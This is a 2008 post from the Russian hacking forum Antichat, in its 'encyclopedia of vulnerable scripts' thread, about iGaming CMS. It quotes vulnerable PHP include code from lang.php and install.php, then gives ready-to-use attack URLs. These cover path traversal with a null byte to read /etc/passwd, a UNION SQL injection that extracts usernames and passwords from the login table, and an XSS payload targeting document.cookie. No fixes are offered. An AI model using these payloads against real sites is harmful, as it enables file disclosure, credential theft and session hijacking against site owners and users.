Форум АНТИЧАТ - Энциклопедия уязвимых скриптов

#11

21.12.2008, 21:22

~~baltazar~~

Banned

Регистрация: 30.03.2007

Сообщений: 344

Провел на форуме:
5149122

Репутация: 2438

Отправить сообщение для baltazar с помощью ICQ

iGaming CMS

Файл: lang.php
Уязвимый код:

Код:

if(isset($_GET['lang']))   

    $include_lang = $_GET['lang'];
}
elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
{
    include_once(TOP_DIR.'/functions/db_api.php');
    $include_lang = get_language();
}
else
{
    $include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');

Код:

http://path/docs/index.php?lang=/../../../../../../../../../../test

Если magic_quotes_gpc = Off,тогда:

Код:

http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00

Файл: install.php

Уязвимый код:

Код:

switch($_GET['whatlang'])
{
case 1:
    include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
    break;

    default:
    include_once(TOP_DIR.'/lang/lang.English.php');
    break;
}

Код:

http://path/install.php?whatlang=1&language=/../../../../../../../test

Если magic_quotes_gpc = Off,то:

Код:

http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00

SQL иньекция:

Код:

http://path/index.php?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*

XSS иньекция:

Код:

http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

Последний раз редактировалось baltazar; 22.12.2008 в 23:52..

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

Библиотека

SladerNon

Болталка

05.02.2007 23:30

Основные методы взлома и защиты скриптов на Php

DIAgen

Авторские статьи

28.05.2006 12:30